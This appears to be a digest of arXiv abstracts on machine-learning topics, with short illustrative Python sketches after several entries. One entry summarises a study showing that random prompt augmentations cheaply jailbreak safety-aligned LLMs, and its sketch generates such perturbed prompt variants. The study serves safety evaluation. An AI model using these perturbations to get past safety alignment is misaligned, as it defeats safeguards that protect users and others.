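print(len(find_bias_conflicting(feats)))
```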
Updated: 2024-12-05 13:37:51
Fields: cs.LG,cs.CV,I.4; I.5
GV-Rep: A Large-Scale Dataset for Genetic Variant Representation Learning
Genetic variants (GVs) are defined as differences in the DNA sequences among individuals and play a crucial role in diagnosing and treating genetic diseases. The rapid decrease in next-generation sequencing cost has led to an exponential increase in patient-level GV data. This growth poses a challenge for clinicians, who must efficiently prioritize patient-specific GVs and integrate them with existing genomic databases to inform patient management. To address the interpretation of GVs, genomic foundation models (GFMs) have emerged. However, these models lack standardized performance assessments, leading to considerable variability in model evaluations. This poses the question: How effectively do deep learning methods classify unknown GVs and align them with clinically verified GVs? We argue that representation learning, which transforms raw data into meaningful feature spaces, is an effective approach for addressing both indexing and classification challenges. We introduce a large-scale Genetic Variant dataset, named GV-Rep, featuring variable-length contexts and detailed annotations, designed for deep learning models to learn GV representations across various traits, diseases, tissue types, and experimental contexts. Our contributions are three-fold: (i) construction of a comprehensive dataset with 7 million records, each labeled with characteristics of the corresponding variants, alongside additional data from 17,548 gene knockout tests across 1,107 cell types, 1,808 variant combinations, and 156 unique clinically verified GVs from real-world patients; (ii) analysis of the structure and properties of the dataset; (iii) experimentation on the dataset with pre-trained GFMs. The results show a significant gap between GFMs' current capabilities and accurate GV representation. We hope this dataset will help advance genomic deep learning to bridge this gap.
Updated: 2024-12-05 13:30:16
Fields: cs.LG,q-bio.GN
MC-LLaVA: Multi-Concept Personalized Vision-Language Model
Current vision-language models (VLMs) show exceptional abilities across diverse tasks including visual question answering. To enhance user experience in practical applications, recent studies investigate VLM personalization to understand user-provided concepts. However, existing studies mainly focus on single-concept personalization, neglecting the existence and interplay of multiple concepts, which limits the real-world applicability of personalized VLMs. In this paper, we propose the first multi-concept personalization method named MC-LLaVA along with a high-quality multi-concept personalization dataset. Specifically, MC-LLaVA uses a joint training strategy incorporating multiple concepts in a single training step, allowing VLMs to perform accurately in multi-concept personalization. To reduce the cost of joint training, MC-LLaVA leverages visual token information for concept token initialization, yielding improved concept representation and accelerating joint training. To advance multi-concept personalization research, we further contribute a high-quality dataset. We carefully collect images from various movies that contain multiple characters and manually generate the multi-concept question-answer samples. Our dataset features diverse movie types and question-answer types. We conduct comprehensive qualitative and quantitative experiments to demonstrate that MC-LLaVA can achieve impressive multi-concept personalized responses, paving the way for VLMs to become better user-specific assistants. The code and dataset will be publicly available at https://github.com/arctanxarc/MC-LLaVA.
Updated: 2024-12-05 13:27:22
Categories: cs.CV,cs.AI
Frequency-Adaptive Low-Latency Object Detection Using Events and Frames
Fusing Events and RGB images for object detection leverages the robustness of Event cameras in adverse environments and the rich semantic information provided by RGB cameras. However, two critical mismatches (low-latency Events vs. high-latency RGB frames, and temporally sparse labels in training vs. continuous streams in inference) significantly hinder high-frequency fusion-based object detection. To address these challenges, we propose the Frequency-Adaptive Low-Latency Object Detector (FAOD). FAOD aligns low-frequency RGB frames with high-frequency Events through an Align Module, which reinforces cross-modal style and spatial proximity to address the Event-RGB mismatch. We further propose a training strategy, Time Shift, which enforces the module to align the prediction from temporally shifted Event-RGB pairs with their original representation, that is, consistent with Event-aligned annotations. This strategy enables the network to use high-frequency Event data as the primary reference while treating low-frequency RGB images as supplementary information, retaining the low-latency nature of the Event stream for high-frequency detection. Furthermore, we observe that these corrected Event-RGB pairs generalize better from low training frequencies to higher inference frequencies than Event data alone. Extensive experiments on the PKU-DAVIS-SOD and DSEC-Detection datasets demonstrate that our FAOD achieves SOTA performance. Specifically, on the PKU-DAVIS-SOD dataset, FAOD achieves a 9.8-point improvement in mAP on fully paired Event-RGB data with only a quarter of the parameters of SODFormer, and maintains robust performance (only a 3-point drop in mAP) under an 80x Event-RGB frequency mismatch.
Updated: 2024-12-05 13:23:06
Categories: cs.CV,cs.AI
Learning Semantic Association Rules from Internet of Things Data
Association Rule Mining (ARM) is the task of discovering commonalities in data in the form of logical implications. ARM is used in the Internet of Things (IoT) for different tasks including monitoring and decision-making. However, existing methods give limited consideration to IoT-specific requirements such as heterogeneity and volume. Furthermore, they do not utilize important static domain-specific description data about IoT systems, which is increasingly represented as knowledge graphs. In this paper, we propose a novel ARM pipeline for IoT data that utilizes both dynamic sensor data and static IoT system metadata. Furthermore, we propose an Autoencoder-based Neurosymbolic ARM method (Aerial) as part of the pipeline to address the high volume of IoT data and reduce the total number of rules that are resource-intensive to process. Aerial learns a neural representation of a given data and extracts association rules from this representation by exploiting the reconstruction (decoding) mechanism of an autoencoder. Extensive evaluations on 3 IoT datasets from 2 domains show that ARM on both static and dynamic IoT data results in more generically applicable rules while Aerial can learn a more concise set of high-quality association rules than the state-of-the-art with full coverage over the datasets.
Updated: 2024-12-05 13:22:28
Categories: cs.LG,cs.AI
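The decoder-probing idea behind Aerial can be sketched as follows: train an autoencoder on binary transaction vectors, then activate only a candidate antecedent and read off which other items the reconstruction turns on. The architecture, threshold, and probing routine below are simplified assumptions rather than the published method.

```python
import torch
import torch.nn as nn

class TransactionAE(nn.Module):
    """Tiny autoencoder over binary transaction vectors (one column per item)."""
    def __init__(self, n_items: int, latent: int = 16):
        super().__init__()
        self.enc = nn.Sequential(nn.Linear(n_items, 64), nn.ReLU(), nn.Linear(64, latent))
        self.dec = nn.Sequential(nn.Linear(latent, 64), nn.ReLU(), nn.Linear(64, n_items))

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return torch.sigmoid(self.dec(self.enc(x)))

@torch.no_grad()
def implied_items(model: TransactionAE, antecedent: list, n_items: int,
                  threshold: float = 0.8) -> list:
    """Probe the decoder: activate only the antecedent items and collect the
    items whose reconstructed probability exceeds the threshold -- these are
    candidate consequents for rules of the form antecedent -> item."""
    probe = torch.zeros(1, n_items)
    probe[0, antecedent] = 1.0
    recon = model(probe)[0]
    return [i for i in range(n_items) if i not in antecedent and recon[i] > threshold]
```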
MultiTASC++: A Continuously Adaptive Scheduler for Edge-Based Multi-Device Cascade Inference
Cascade systems, consisting of a lightweight model processing all samples and a heavier, high-accuracy model refining challenging samples, have become a widely-adopted distributed inference approach to achieving high accuracy and maintaining a low computational burden for mobile and IoT devices. As intelligent indoor environments, like smart homes, continue to expand, a new scenario emerges, the multi-device cascade. In this setting, multiple diverse devices simultaneously utilize a shared heavy model hosted on a server, often situated within or close to the consumer environment. This work introduces MultiTASC++, a continuously adaptive multi-tenancy-aware scheduler that dynamically controls the forwarding decision functions of devices to optimize system throughput while maintaining high accuracy and low latency. Through extensive experimentation in diverse device environments and with varying server-side models, we demonstrate the scheduler's efficacy in consistently maintaining a targeted satisfaction rate while providing the highest available accuracy across different device tiers and workloads of up to 100 devices. This demonstrates its scalability and efficiency in addressing the unique challenges of collaborative DNN inference in dynamic and diverse IoT environments.
Updated: 2024-12-05 13:19:34
Categories: cs.LG,cs.DC
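A hedged sketch of the kind of continuously adaptive forwarding control the scheduler performs: each device keeps a confidence threshold deciding which samples it forwards to the shared server model, nudged online from the observed satisfaction rate. The controller, its update rule, and all names are illustrative assumptions, not MultiTASC++'s actual algorithm.

```python
class ForwardingController:
    """Per-device confidence thresholds deciding which samples each device
    forwards to the shared server model, adapted continuously online."""
    def __init__(self, n_devices: int, target_rate: float = 0.95, lr: float = 0.05):
        self.thresholds = [0.5] * n_devices
        self.target_rate = target_rate  # desired fraction of forwarded samples served in time
        self.lr = lr

    def update(self, device: int, served_rate: float) -> None:
        # Server headroom (served_rate above target): raise the threshold so the
        # device forwards more samples and gains accuracy; server saturated:
        # lower it so only the hardest samples are forwarded.
        error = served_rate - self.target_rate
        new_t = self.thresholds[device] + self.lr * error
        self.thresholds[device] = min(1.0, max(0.0, new_t))

    def should_forward(self, device: int, confidence: float) -> bool:
        # Low-confidence light-model predictions are the "challenging" samples.
        return confidence < self.thresholds[device]
```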
DeiSAM: Segment Anything with Deictic Prompting
Large-scale, pre-trained neural networks have demonstrated strong capabilities in various tasks, including zero-shot image segmentation. To identify concrete objects in complex scenes, humans instinctively rely on deictic descriptions in natural language, i.e., referring to something depending on the context, such as "The object that is on the desk and behind the cup." However, deep learning approaches cannot reliably interpret such deictic representations due to their lack of reasoning capabilities in complex scenarios. To remedy this issue, we propose DeiSAM -- a combination of large pre-trained neural networks with differentiable logic reasoners -- for deictic promptable segmentation. Given a complex, textual segmentation description, DeiSAM leverages Large Language Models (LLMs) to generate first-order logic rules and performs differentiable forward reasoning on generated scene graphs. Subsequently, DeiSAM segments objects by matching them to the logically inferred image regions. As part of our evaluation, we propose the Deictic Visual Genome (DeiVG) dataset, containing paired visual input and complex, deictic textual prompts. Our empirical results demonstrate that DeiSAM is a substantial improvement over purely data-driven baselines for deictic promptable segmentation.
Updated: 2024-12-05 13:15:34
Categories: cs.LG,cs.AI,cs.CV
If You Can't Use Them, Recycle Them: Optimizing Merging at Scale Mitigates Performance Tradeoffs
Model merging has shown great promise at combining expert models, but the benefit of merging is unclear when merging "generalist" models trained on many tasks. We explore merging in the context of large (~100B) models, by recycling checkpoints that exhibit tradeoffs among different tasks. Such checkpoints are often created in the process of developing a frontier model, and many suboptimal ones are usually discarded. Given a pool of model checkpoints obtained from different training runs (e.g., different stages, objectives, hyperparameters, and data mixtures), which naturally show tradeoffs across different language capabilities (e.g., instruction following vs. code generation), we investigate whether merging can recycle such suboptimal models into a Pareto-optimal one. Our optimization algorithm tunes the weight of each checkpoint in a linear combination, resulting in a Pareto-optimal model that outperforms both individual models and merge-based baselines. Further analysis shows that good merges tend to include almost all checkpoints with non-zero weights, indicating that even seemingly bad initial checkpoints can contribute to good final merges.
Updated: 2024-12-05 13:12:51
Categories: cs.CL,cs.AI
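To make the recycling idea concrete, the sketch below merges checkpoints as a weighted average of their state dicts and searches the weight simplex with random Dirichlet draws. The paper's optimization algorithm is more sophisticated, so treat the evaluate callback, the search strategy, and the float-parameter assumption as placeholders.

```python
import copy
import numpy as np

def merge_state_dicts(state_dicts, weights):
    """Linearly combine checkpoints: theta = sum_i w_i * theta_i.
    Assumes all checkpoints share keys and have float parameters."""
    merged = copy.deepcopy(state_dicts[0])
    for key in merged:
        merged[key] = sum(w * sd[key] for w, sd in zip(weights, state_dicts))
    return merged

def random_search_merge(state_dicts, evaluate, n_trials=50, seed=0):
    """evaluate(state_dict) -> scalar utility aggregating the task metrics
    of interest. Returns the best mixing weights found on the simplex."""
    rng = np.random.default_rng(seed)
    best_w, best_score = None, float("-inf")
    for _ in range(n_trials):
        w = rng.dirichlet(np.ones(len(state_dicts)))  # non-negative, sums to 1
        score = evaluate(merge_state_dicts(state_dicts, w.tolist()))
        if score > best_score:
            best_w, best_score = w, score
    return best_w, best_score
```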
Methodology for Online Estimation of Rheological Parameters in Polymer Melts Using Deep Learning and Microfluidics
Microfluidic devices are increasingly used in biological and chemical experiments due to their cost-effectiveness for rheological estimation in fluids. However, these devices often face challenges in terms of accuracy, size, and cost. This study presents a methodology, integrating deep learning, modeling and simulation to enhance the design of microfluidic systems, used to develop an innovative approach for viscosity measurement of polymer melts. We use synthetic data generated from the simulations to train a deep learning model, which then identifies rheological parameters of polymer melts from pressure drop and flow rate measurements in a microfluidic circuit, enabling online estimation of fluid properties. By improving the accuracy and flexibility of microfluidic rheological estimation, our methodology accelerates the design and testing of microfluidic devices, reducing reliance on physical prototypes, and offering significant contributions to the field.
Updated: 2024-12-05 13:11:04
Categories: physics.flu-dyn,cs.AI
Understanding Memorization in Generative Models via Sharpness in Probability Landscapes
In this paper, we introduce a geometric framework to analyze memorization in diffusion models using the eigenvalues of the Hessian of the log probability density. We propose that memorization arises from isolated points in the learned probability distribution, characterized by sharpness in the probability landscape, as indicated by large negative eigenvalues of the Hessian. Through experiments on various datasets, we demonstrate that these eigenvalues effectively detect and quantify memorization. Our approach provides a clear understanding of memorization in diffusion models and lays the groundwork for developing strategies to ensure secure and reliable generative models.
Updated: 2024-12-05 13:07:24
Categories: cs.LG,cs.AI
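Since a diffusion model's score network approximates grad_x log p(x), the Hessian of the log density is the Jacobian of the score, and its extreme eigenvalues can be probed with autograd. Below is a minimal power-iteration sketch, assuming a callable score_fn; the paper's actual estimator may differ.

```python
import torch

def extreme_hessian_eigenvalue(score_fn, x: torch.Tensor, n_iter: int = 50) -> float:
    """Probe sharpness of log p at x. The Hessian H is the Jacobian of the
    score; since H is symmetric, the vector-Jacobian product J^T v (cheap via
    autograd) equals H v. Power iteration finds the eigenvalue of largest
    magnitude -- at memorized (isolated, sharp) points this is expected to be
    a large negative number."""
    x = x.detach().requires_grad_(True)

    def hvp(v: torch.Tensor) -> torch.Tensor:
        s = score_fn(x)  # s ~ grad_x log p(x), same shape as x
        (g,) = torch.autograd.grad(s, x, grad_outputs=v)
        return g

    v = torch.randn_like(x)
    v = v / v.norm()
    for _ in range(n_iter):
        v = hvp(v)
        v = v / (v.norm() + 1e-12)
    # Signed Rayleigh quotient of the converged direction.
    return (v * hvp(v)).sum().item()
```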
Monet: Mixture of Monosemantic Experts for Transformers
Understanding the internal computations of large language models (LLMs) is crucial for aligning them with human values and preventing undesirable behaviors like toxic content generation. However, mechanistic interpretability is hindered by polysemanticity -- where individual neurons respond to multiple, unrelated concepts. While Sparse Autoencoders (SAEs) have attempted to disentangle these features through sparse dictionary learning, they have compromised LLM performance due to reliance on post-hoc reconstruction loss. To address this issue, we introduce the Mixture of Monosemantic Experts for Transformers (Monet) architecture, which incorporates sparse dictionary learning directly into end-to-end Mixture-of-Experts pretraining. Our novel expert decomposition method enables scaling the expert count to 262,144 per layer while total parameters scale proportionally to the square root of the number of experts. Our analyses demonstrate mutual exclusivity of knowledge across experts and showcase the parametric knowledge encapsulated within individual experts. Moreover, Monet allows knowledge manipulation over domains, languages, and toxicity mitigation without degrading general performance. Our pursuit of transparent LLMs highlights the potential of scaling expert counts to enhance mechanistic interpretability and directly resect the internal knowledge to fundamentally adjust model behavior. The source code and pretrained checkpoints are available at https://github.com/dmis-lab/Monet.
Updated: 2024-12-05 13:06:03
Categories: cs.AI
Text Change Detection in Multilingual Documents Using Image Comparison
Document comparison typically relies on optical character recognition (OCR) as its core technology. However, OCR requires the selection of appropriate language models for each document and the performance of multilingual or hybrid models remains limited. To overcome these challenges, we propose text change detection (TCD) using an image comparison model tailored for multilingual documents. Unlike OCR-based approaches, our method employs word-level text image-to-image comparison to detect changes. Our model generates bidirectional change segmentation maps between the source and target documents. To enhance performance without requiring explicit text alignment or scaling preprocessing, we employ correlations among multi-scale attention features. We also construct a benchmark dataset comprising actual printed and scanned word pairs in various languages to evaluate our model. We validate our approach using our benchmark dataset and public benchmarks Distorted Document Images and the LRDE Document Binarization Dataset. We compare our model against state-of-the-art semantic segmentation and change detection models, as well as to conventional OCR-based models.
Updated: 2024-12-05 13:04:10
Categories: cs.CV,cs.AI,cs.CL,cs.LG
Marrying Causal Representation Learning with Dynamical Systems for Science
Causal representation learning promises to extend causal models to hidden causal variables from raw entangled measurements. However, most progress has focused on proving identifiability results in different settings, and we are not aware of any successful real-world application. At the same time, the field of dynamical systems benefited from deep learning and scaled to countless applications but does not allow parameter identification. In this paper, we draw a clear connection between the two and their key assumptions, allowing us to apply identifiable methods developed in causal representation learning to dynamical systems. At the same time, we can leverage scalable differentiable solvers developed for differential equations to build models that are both identifiable and practical. Overall, we learn explicitly controllable models that isolate the trajectory-specific parameters for further downstream tasks such as out-of-distribution classification or treatment effect estimation. We experiment with a wind simulator with partially known factors of variation. We also apply the resulting model to real-world climate data and successfully answer downstream causal questions in line with existing literature on climate change.
Updated: 2024-12-05 13:03:55
Categories: cs.LG,stat.ML
Stochastic Monkeys at Play: Random Augmentations Cheaply Break LLM Safety Alignment
Safety alignment of Large Language Models (LLMs) has recently become a critical objective of model developers. In response, a growing body of work has been investigating how safety alignment can be bypassed through various jailbreaking methods, such as adversarial attacks. However, these jailbreak methods can be rather costly or involve a non-trivial amount of creativity and effort, introducing the assumption that malicious users are high-resource or sophisticated. In this paper, we study how simple random augmentations to the input prompt affect safety alignment effectiveness in state-of-the-art LLMs, such as Llama 3 and Qwen 2. We perform an in-depth evaluation of 17 different models and investigate the intersection of safety under random augmentations with multiple dimensions: augmentation type, model size, quantization, fine-tuning-based defenses, and decoding strategies (e.g., sampling temperature). We show that low-resource and unsophisticated attackers, i.e. "stochastic monkeys", can significantly improve their chances of bypassing alignment with just 25 random augmentations per prompt. Source code and data: https://github.com/uiuc-focal-lab/stochastic-monkeys/
Updated: 2024-12-05 12:58:44
Categories: cs.LG,cs.AI
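A toy version of the threat model: generate a handful of cheap character-level perturbations of a prompt. The 25-variant budget mirrors the description above, but the specific edit operations and edit rate are illustrative assumptions (the paper evaluates several augmentation types).

```python
import random
import string

def random_augment(prompt: str, n_variants: int = 25,
                   edit_frac: float = 0.05, seed: int = 0) -> list:
    """Generate cheap character-level random perturbations of a prompt."""
    rng = random.Random(seed)
    variants = []
    n_edits = max(1, int(edit_frac * len(prompt)))
    for _ in range(n_variants):
        chars = list(prompt)
        for _ in range(n_edits):
            if not chars:
                break
            i = rng.randrange(len(chars))
            op = rng.choice(["substitute", "insert", "delete"])
            if op == "substitute":
                chars[i] = rng.choice(string.ascii_letters)
            elif op == "insert":
                chars.insert(i, rng.choice(string.ascii_letters + string.digits))
            else:
                del chars[i]
        variants.append("".join(chars))
    return variants

# Each variant is then sent to the target model; any one of them bypassing
# alignment counts as a success for the attacker.
print(random_augment("example prompt goes here", n_variants=3))
```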
Compositional Generative Multiphysics and Multi-component Simulation
Multiphysics simulation, which models the interactions between multiple physical processes, and multi-component simulation of complex structures are critical in fields like nuclear and aerospace engineering. Previous studies often rely on numerical solvers or machine learning-based surrogate models to solve or accelerate these simulations. However, multiphysics simulations typically require integrating multiple specialized solvers-each responsible for evolving a specific physical process-into a coupled program, which introduces significant development challenges. Furthermore, no universal algorithm exists for multi-component simulations, which adds to the complexity. Here we propose compositional Multiphysics and Multi-component Simulation with Diffusion models (MultiSimDiff) to overcome these challenges. During diffusion-based training, MultiSimDiff learns energy functions modeling the conditional probability of one physical process/component conditioned on other processes/components. In inference, MultiSimDiff generates coupled multiphysics solutions and multi-component structures by sampling from the joint probability distribution, achieved by composing the learned energy functions in a structured way. We test our method in three tasks. In the reaction-diffusion and nuclear thermal coupling problems, MultiSimDiff successfully predicts the coupling solution using decoupled data, while the surrogate model fails in the more complex second problem. For the thermal and mechanical analysis of the prismatic fuel element, MultiSimDiff trained for single component prediction accurately predicts a larger structure with 64 components, reducing the relative error by 40.3% compared to the surrogate model.
Updated: 2024-12-05 12:58:30
Categories: cs.LG
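The compositional sampling idea can be sketched as an annealed Langevin-style loop that follows the sum of the scores of the per-process models, i.e., it samples from the product of their learned distributions. The schedule, step sizes, and conditioning below are simplified assumptions rather than MultiSimDiff's actual sampler.

```python
import torch

@torch.no_grad()
def compositional_sample(score_fns, shape, n_steps: int = 200,
                         step_size: float = 1e-3, noise_scale: float = 1e-2):
    """Draw a sample from the joint distribution implied by several learned
    energies by following the sum of their scores.
    score_fns: list of callables (x, t) -> grad_x log p_k(x | other fields)."""
    x = torch.randn(shape)
    for step in range(n_steps):
        t = 1.0 - step / n_steps  # simple linear "time" annealing
        joint_score = sum(fn(x, t) for fn in score_fns)
        x = x + step_size * joint_score + noise_scale * torch.randn_like(x)
    return x
```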
Lexicalization Is All You Need: Examining the Impact of Lexical Knowledge in a Compositional QALD System
In this paper, we examine the impact of lexicalization on Question Answering over Linked Data (QALD). It is well known that one of the key challenges in interpreting natural language questions with respect to SPARQL lies in bridging the lexical gap, that is, mapping the words in the query to the correct vocabulary elements. We argue in this paper that lexicalization, that is, explicit knowledge about the potential interpretations of a word with respect to the given vocabulary, significantly eases the task and increases the performance of QA systems. Towards this goal, we present a compositional QA system that can leverage explicit lexical knowledge in a compositional manner to infer the meaning of a question in terms of a SPARQL query. We show that such a system, given lexical knowledge, has a performance well beyond current QA systems, achieving up to a 35.8% increase in the micro F1 score compared to the best QA system on QALD-9. This shows the importance and potential of including explicit lexical knowledge. In contrast, we show that LLMs have limited abilities to exploit lexical knowledge, with only marginal improvements compared to a version without lexical knowledge. This shows that LLMs have no ability to compositionally interpret a question on the basis of the meaning of its parts, a key feature of compositional approaches. Taken together, our work shows new avenues for QALD research, emphasizing the importance of lexicalization and compositionality.
Updated: 2024-12-05 12:56:40
Categories: cs.AI,cs.CL,cs.IR
SRAM-Based PUF Reliability Prediction Using Cell-Imbalance Characterization in the State Space Diagram
This work proposes a methodology to estimate the statistical distribution of the probability that a 6T bit-cell starts up to a given logic value in SRAM memories for PUF applications. First, the distribution is obtained experimentally in a 65-nm CMOS device. As this distribution cannot be reproduced by electrical simulation, we explore the use of an alternative parameter defined as the distance between the origin and the separatrix in the bit-cell state space to quantify the mismatch of the cell. The resulting distribution of this parameter obtained from Monte Carlo simulations is then related to the start-up probability distribution using a two-component logistic function. The reported results show that the proposed imbalance factor is a good predictor for PUF-related reliability estimation with the advantage that can be applied at the early design stages.
Updated: 2024-12-05 12:49:22
Categories: cs.CR
DeepFEA: Deep Learning for Prediction of Transient Finite Element Analysis Solutions
Finite Element Analysis (FEA) is a powerful but computationally intensive method for simulating physical phenomena. Recent advancements in machine learning have led to surrogate models capable of accelerating FEA. Yet there are still limitations in developing surrogates of transient FEA models that can simultaneously predict the solutions for both nodes and elements with applicability on both the 2D and 3D domains. Motivated by this research gap, this study proposes DeepFEA, a deep learning-based framework that leverages a multilayer Convolutional Long Short-Term Memory (ConvLSTM) network branching into two parallel convolutional neural networks to predict the solutions for both nodes and elements of FEA models. The proposed network is optimized using a novel adaptive learning algorithm, called Node-Element Loss Optimization (NELO). NELO minimizes the error occurring at both branches of the network enabling the prediction of solutions for transient FEA simulations. The experimental evaluation of DeepFEA is performed on three datasets in the context of structural mechanics, generated to serve as publicly available reference datasets. The results show that DeepFEA can achieve less than 3% normalized mean and root mean squared error for 2D and 3D simulation scenarios, and inference times that are two orders of magnitude faster than FEA. In contrast, relevant state-of-the-art methods face challenges with multi-dimensional output and dynamic input prediction. Furthermore, DeepFEA's robustness was demonstrated in a real-life biomedical scenario, confirming its suitability for accurate and efficient predictions of FEA simulations.
Updated: 2024-12-05 12:46:18
Categories: cs.LG,cs.AI,cs.CE
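A minimal PyTorch sketch of the two-branch output and an adaptive node-element loss. The real model uses a multilayer ConvLSTM trunk and a more elaborate NELO schedule, so the architecture, channel counts, and weighting below are illustrative assumptions.

```python
import torch
import torch.nn as nn

class TwoBranchHead(nn.Module):
    """Shared trunk branching into parallel convolutional heads that predict
    node fields and element fields on the same grid (a simplification)."""
    def __init__(self, in_ch: int = 8, node_ch: int = 3, elem_ch: int = 6):
        super().__init__()
        self.trunk = nn.Sequential(nn.Conv2d(in_ch, 32, 3, padding=1), nn.ReLU())
        self.node_head = nn.Conv2d(32, node_ch, 1)
        self.elem_head = nn.Conv2d(32, elem_ch, 1)

    def forward(self, x):
        h = self.trunk(x)
        return self.node_head(h), self.elem_head(h)

def node_element_loss(node_pred, node_true, elem_pred, elem_true):
    """Adaptive two-branch loss: weight each branch by its current share of
    the total error, focusing training on whichever branch is currently worse."""
    l_node = nn.functional.mse_loss(node_pred, node_true)
    l_elem = nn.functional.mse_loss(elem_pred, elem_true)
    total = l_node.detach() + l_elem.detach() + 1e-12
    return (l_node.detach() / total) * l_node + (l_elem.detach() / total) * l_elem
```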
Group Distributionally Robust Optimization can Suppress Class Imbalance Effect in Network Traffic Classification
Internet services have led to an eruption of network traffic, and machine learning on these Internet data has become an indispensable tool, especially when the application is risk-sensitive. This paper focuses on network traffic classification in the presence of class imbalance, which fundamentally and ubiquitously exists in Internet data analysis. The presence of class imbalance typically shifts the optimal decision boundary, resulting in a less optimal solution for machine learning models. To alleviate this effect, we propose strategies for mitigating the class imbalance through the lens of group distributionally robust optimization. Our approach iteratively updates the non-parametric weights for separate classes and optimizes the learning model by minimizing reweighted losses. We interpret the optimization process from a Stackelberg game perspective and perform extensive experiments on typical benchmarks. Results show that our approach can not only suppress the negative effect of class imbalance but also improve the comprehensive performance in prediction.
Updated: 2024-12-05 12:45:09
Categories: stat.ML,cs.LG
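The reweighting scheme can be illustrated with the standard exponentiated-gradient update from group distributionally robust optimization: classes with higher loss receive exponentially larger weights at each step. This is a sketch of the generic technique, assuming per-sample losses and class ids; the paper's exact update may differ.

```python
import torch

def group_dro_step(per_sample_loss: torch.Tensor, group_ids: torch.Tensor,
                   group_weights: torch.Tensor, eta: float = 0.01):
    """One Group-DRO update. per_sample_loss: (N,) loss tensor with grad;
    group_ids: (N,) long tensor of class ids; group_weights: (K,) simplex
    weights carried across steps. Returns (reweighted loss, new weights)."""
    n_groups = group_weights.numel()
    group_losses = torch.zeros(n_groups)
    for g in range(n_groups):
        mask = group_ids == g
        if mask.any():
            group_losses[g] = per_sample_loss[mask].mean()
    # Exponentiated-gradient ascent on the (adversarial) group weights:
    # high-loss classes get upweighted, then weights are renormalized.
    new_weights = group_weights * torch.exp(eta * group_losses.detach())
    new_weights = new_weights / new_weights.sum()
    return (new_weights * group_losses).sum(), new_weights
```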
Efficiently Learning at Test-Time: Active Fine-Tuning of LLMs
Recent efforts in fine-tuning language models often rely on automatic data selection, commonly using Nearest Neighbors retrieval from large datasets. However, we theoretically show that this approach tends to select redundant data, limiting its effectiveness or even hurting performance. To address this, we introduce SIFT, a data selection algorithm designed to reduce uncertainty about the model's response given a prompt, which unifies ideas from retrieval and active learning. Whereas Nearest Neighbor retrieval typically fails in the presence of information duplication, SIFT accounts for information duplication and optimizes the overall information gain of the selected examples. We focus our evaluations on fine-tuning at test-time for prompt-specific language modeling on the Pile dataset, and show that SIFT consistently outperforms Nearest Neighbor retrieval, with minimal computational overhead. Moreover, we show that our uncertainty estimates can predict the performance gain of test-time fine-tuning, and use this to develop an adaptive algorithm that invests test-time compute proportional to realized performance gains. We provide the activeft (Active Fine-Tuning) library, which can be used as a drop-in replacement for Nearest Neighbor retrieval.
Updated: 2024-12-05 12:40:16
Categories: cs.LG,cs.AI
Memory-efficient Continual Learning with Neural Collapse Contrastive
Contrastive learning has significantly improved representation quality, enhancing knowledge transfer across tasks in continual learning (CL). However, catastrophic forgetting remains a key challenge, as contrastive-based methods primarily focus on "soft relationships" or "softness" between samples, which shift with changing data distributions and lead to representation overlap across tasks. Recently, the newly identified Neural Collapse phenomenon has shown promise in CL by focusing on "hard relationships" or "hardness" between samples and fixed prototypes. However, this approach overlooks "softness", crucial for capturing intra-class variability, and this rigid focus can also pull old class representations toward current ones, increasing forgetting. Building on these insights, we propose Focal Neural Collapse Contrastive (FNC2), a novel representation learning loss that effectively balances both soft and hard relationships. Additionally, we introduce the Hardness-Softness Distillation (HSD) loss to progressively preserve the knowledge gained from these relationships across tasks. Our method outperforms state-of-the-art approaches, particularly in minimizing memory reliance. Remarkably, even without the use of memory, our approach rivals rehearsal-based methods, offering a compelling solution for data privacy concerns.
Updated: 2024-12-05 12:38:58
Categories: cs.CV,cs.AI,cs.LG
Thermal and RGB Images Work Better Together in Wind Turbine Damage Detection
The inspection of wind turbine blades (WTBs) is crucial for ensuring their structural integrity and operational efficiency. Traditional inspection methods can be dangerous and inefficient, prompting the use of unmanned aerial vehicles (UAVs) that access hard-to-reach areas and capture high-resolution imagery. In this study, we address the challenge of enhancing defect detection on WTBs by integrating thermal and RGB images obtained from UAVs. We propose a multispectral image composition method that combines thermal and RGB imagery through spatial coordinate transformation, key point detection, binary descriptor creation, and weighted image overlay. Using a benchmark dataset of WTB images annotated for defects, we evaluated several state-of-the-art object detection models. Our results show that composite images significantly improve defect detection efficiency. Specifically, the YOLOv8 model's accuracy increased from 91% to 95%, precision from 89% to 94%, recall from 85% to 92%, and F1-score from 87% to 93%. The number of false positives decreased from 6 to 3, and missed defects reduced from 5 to 2. These findings demonstrate that integrating thermal and RGB imagery enhances defect detection on WTBs, contributing to improved maintenance and reliability.
Updated: 2024-12-05 12:32:45
Categories: cs.CV,cs.AI,cs.RO,I.4.8; I.4.6; I.2.10; I.2.9
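The composition pipeline described above maps naturally onto OpenCV primitives: keypoints with binary descriptors (ORB), a RANSAC homography for the spatial coordinate transform, and a weighted overlay. Below is a sketch assuming an 8-bit single-channel thermal image and enough good matches; the study's exact transform and weighting may differ.

```python
import cv2
import numpy as np

def compose_thermal_rgb(rgb: np.ndarray, thermal: np.ndarray,
                        alpha: float = 0.6) -> np.ndarray:
    """Align a thermal image to an RGB image and blend them.
    rgb: (H, W, 3) uint8; thermal: single-channel uint8."""
    gray = cv2.cvtColor(rgb, cv2.COLOR_BGR2GRAY)
    orb = cv2.ORB_create(1000)  # key point detection + binary descriptors
    kp_rgb, des_rgb = orb.detectAndCompute(gray, None)
    kp_th, des_th = orb.detectAndCompute(thermal, None)

    matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
    matches = sorted(matcher.match(des_th, des_rgb), key=lambda m: m.distance)[:100]

    src = np.float32([kp_th[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)
    dst = np.float32([kp_rgb[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)
    H, _ = cv2.findHomography(src, dst, cv2.RANSAC, 5.0)  # spatial transform

    warped = cv2.warpPerspective(thermal, H, (rgb.shape[1], rgb.shape[0]))
    warped = cv2.applyColorMap(warped, cv2.COLORMAP_JET)  # visualize heat
    return cv2.addWeighted(rgb, alpha, warped, 1.0 - alpha, 0)  # weighted overlay
```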
Enhancing Mathematical Reasoning in LLMs with Background Operators
